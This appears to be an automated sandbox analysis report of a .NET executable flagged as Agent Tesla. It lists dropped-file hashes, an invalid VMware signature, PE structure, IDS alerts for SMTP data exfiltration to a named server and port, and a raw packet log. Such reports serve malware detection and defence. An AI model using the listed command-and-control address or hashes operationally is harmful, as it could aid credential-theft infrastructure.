                                                              SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):6.129581635319933
                                                              Encrypted:false
                                                              SSDEEP:768:U+6OFUXSLepRRtsCt4pX5yjYeK1rZbsOK/C5o4iqNSc348v4Devsoe+gcIAMkYh:P6OFUXSLep7tsGEX5OK1rZbsO559iJcQ
                                                              MD5:DBD0E17845DA07384D942B76268CF5B7
                                                              SHA1:C1FCA3C8AB7E6D60FE3703A4EE52BBAC1D61E6AD
                                                              SHA-256:4A9A9156581680F9B5082C685A656994A2248FF274900710014CA9C3C7868DB8
                                                              SHA-512:F7697D93690F3BD673501401B4286CF4794B39563E5D1707AF5BD407E2ACB2CBA8F3331E0DF9091F0CC4895155AC9BE9AA89668F92B33A9319EA25551B876F8C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Process:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2474944
                                                              Entropy (8bit):7.754828034068089
                                                              Encrypted:false
                                                              SSDEEP:49152:CJdEishAFuQlec9L4mpYmFJq+o1LYYVRC8kKK:MqXAct9mFJq3KYXC8BK
                                                              MD5:1590A3EFB4A143305E7182FBD284A414
                                                              SHA1:4B1910FC583442A94A7A246C5424354991E22F13
                                                              SHA-256:B11EC3F1E913B4C0CAEAF24B194998E7702DA6C0B30AFC8A147DF52B26FD829F
                                                              SHA-512:6B34BB151902E7C0A9AC349D16BE5EBE23C4574FD1B4131D63691AB7B8771BECCF2044DB85B5714FC90DA15FB0C4029313A174497FC85652E1E6A4C084F010F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:modified
                                                              Size (bytes):2474944
                                                              Entropy (8bit):7.754828034068089
                                                              Encrypted:false
                                                              SSDEEP:49152:CJdEishAFuQlec9L4mpYmFJq+o1LYYVRC8kKK:MqXAct9mFJq3KYXC8BK
                                                              MD5:1590A3EFB4A143305E7182FBD284A414
                                                              SHA1:4B1910FC583442A94A7A246C5424354991E22F13
                                                              SHA-256:B11EC3F1E913B4C0CAEAF24B194998E7702DA6C0B30AFC8A147DF52B26FD829F
                                                              SHA-512:6B34BB151902E7C0A9AC349D16BE5EBE23C4574FD1B4131D63691AB7B8771BECCF2044DB85B5714FC90DA15FB0C4029313A174497FC85652E1E6A4C084F010F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.635119590192788
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Ref#0503711.exe
                                                              File size:1'907'648 bytes
                                                              MD5:3b2e54913c8b29ce886c8b36f8dd0cfc
                                                              SHA1:ff514c4f55dc70f5d1914fcf7118f24fd636e8a2
                                                              SHA256:405832c40918da8ad82482319361d443a19cb05d8834e0258e5c54bf11faae84
                                                              SHA512:c872c307a060c3ec9b026d24f159447d74de06a5e2e73f5729c9360c5f20b0dc1afe17c870793309f4bddd6c1ec52ce68a1dca9c0b102d089ab48a6db7071c81
                                                              SSDEEP:49152:RFXZRd8cSc710RxibZkpQuiQcWpn0JGgKD:/XPmct7uMqn0QD
                                                              TLSH:DB95BE3E699D4DA6EACF57B9848E4928F3EB584B8E438F1D13C16DEB118230524C2D5F
                                                              Icon Hash:929296929e9e8e73
                                                              Entrypoint:0x5a1afe
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6703BA64 [Mon Oct 7 10:39:32 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Signature Valid:false
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The digital signature of the object did not verify
                                                              Error Number:-2146869232
                                                              Not Before, Not After
                                                              • 04/05/2022 01:00:00 05/05/2024 00:59:59
                                                              Subject Chain
                                                              • CN="VMware, Inc.", O="VMware, Inc.", L=Palo Alto, S=California, C=US, SERIALNUMBER=2853894, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                              Version:3
                                                              Thumbprint MD5:E952656E95A95C1449C2A741130267B5
                                                              Thumbprint SHA-1:0AD116E8D49DCC487A04FAC2FBCCB53FD6721013
                                                              Thumbprint SHA-256:3518995D983C041C80E4EBDD664252B6D2AE342B305B4A3A1611FC4FC501E0EB
                                                              Serial:08579742A953BAD90D4237A3F3E38C5E
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a1aa8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a2000 | 0x2f200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1cf200 | 0x29c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x19fb04 | 0x19fc00 | d1c72163e293239f76c5a4663af69624 | False | 0.807054034500902 | data | 7.6840259996063836 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1a2000 | 0x2f200 | 0x2f200 | c0adcbd9cab2b173e07b3aa1b225b555 | False | 0.36255077088859416 | data | 6.24104888819665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d2000 | 0xc | 0x200 | c16ff1f7b417519c6461311f332e3b69 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1a22b0 | 0x709e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9976066597294485
RT_ICON | 0x1a9350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.17033893292322252
RT_ICON | 0x1b9b78 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.271415808282531
RT_ICON | 0x1c3020 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.3012014787430684
RT_ICON | 0x1c84a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.28259329239489844
RT_ICON | 0x1cc6d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.38558091286307056
RT_ICON | 0x1cec78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.4598968105065666
RT_ICON | 0x1cfd20 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.5704918032786885
RT_ICON | 0x1d06a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.6631205673758865
RT_GROUP_ICON | 0x1d0b10 | 0x84 | data | | | 0.7272727272727273
RT_VERSION | 0x1d0b94 | 0x396 | big endian ispell hash file (?), | | | 0.42919389978213507
RT_MANIFEST | 0x1d0f2c | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T18:05:56.019610+0200 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
2024-10-07T18:05:56.019610+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
2024-10-07T18:07:33.489717+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
2024-10-07T18:07:33.489717+0200 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Oct 7, 2024 18:05:53.147986889 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.147994995 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.192223072 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.199544907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.199759007 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224056959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224240065 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224376917 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224386930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224630117 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224649906 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224662066 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224685907 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.224735975 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224735975 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224735975 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.224744081 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225184917 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225308895 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.225308895 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.225316048 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225500107 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225790977 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.225797892 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225905895 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225929976 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.225954056 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.225954056 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.225960970 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.226079941 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.226079941 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.226516962 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.226634979 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.226974964 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.226989985 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.227118015 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.227118015 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.227123976 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.227628946 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.228435040 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.228451014 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.228734970 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.228740931 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.229362011 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.229391098 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.229406118 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.229470015 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.229475021 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.230376959 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.230396986 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.230487108 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.230487108 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.230487108 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.230494022 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.231606007 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.270548105 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.270625114 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.270776033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.270776033 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.270793915 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.272682905 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.309716940 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.309777975 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.309813023 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.309822083 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.309845924 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.309940100 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:53.310045004 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.310050011 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.310305119 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.310348034 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.310379982 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.310388088 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.310410976 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.310480118 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.310936928 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.310957909 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.311029911 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.311029911 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.311034918 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.311098099 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.311885118 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.311903954 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.312855005 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.312870026 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.312881947 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.312942982 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.312942982 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.313957930 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.314048052 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.314054012 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.314183950 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.314711094 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.314734936 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.314785004 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.314791918 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.314814091 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.314907074 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.315221071 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.315246105 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.315311909 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.315319061 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.315414906 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.315458059 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.315668106 CEST58749733162.254.34.31192.168.2.4
                                                              Oct 7, 2024 18:05:53.315808058 CEST49733587192.168.2.4162.254.34.31
                                                              Oct 7, 2024 18:05:53.389946938 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390017986 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390079021 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390100002 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390275002 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390316010 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390316010 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390326023 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390549898 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390738010 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390758038 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390790939 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390795946 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.390837908 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.390872955 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.391614914 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.391635895 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.392010927 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.392018080 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.392105103 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.392370939 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.392391920 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.392460108 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.392460108 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.392467976 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.392532110 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.393378973 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.393403053 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.393497944 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.393512964 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.393848896 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.394299984 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.394324064 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.394867897 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.394884109 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.395132065 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.395215988 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.395241022 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.395343065 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.395343065 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.395349026 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.395982981 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.435547113 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.435576916 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.435663939 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.435663939 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.435683012 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.435966015 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473041058 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473074913 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473170042 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473170042 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473187923 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473521948 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473547935 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473571062 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473577023 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.473593950 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473601103 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.473726034 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.475028992 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.475055933 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.475307941 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:53.475313902 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:53.475414991 CEST49731443192.168.2.4104.21.56.249
